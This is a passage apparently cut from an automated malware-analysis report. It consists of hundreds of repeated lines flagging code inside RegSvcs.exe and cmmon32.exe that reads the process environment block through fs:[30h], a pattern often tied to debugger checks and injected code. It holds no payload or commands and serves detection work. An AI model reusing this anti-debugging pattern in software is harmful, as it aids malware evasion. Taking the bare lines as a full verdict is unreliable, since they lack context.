            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A24A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A24A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A03A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A9B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A9B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A2927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A74257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A135A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A98DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A6A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A23D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A63540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A07D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A237F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019E4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019FFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A646A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A7FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A116E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A28EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A9FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A136CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01AB8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A9FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A18E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A1A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019EE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_01A0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_019F766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A190AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A53884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A53884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A914FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A57016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A57016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A57016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A92073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A035A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A569A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A01DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A01DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A01DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]
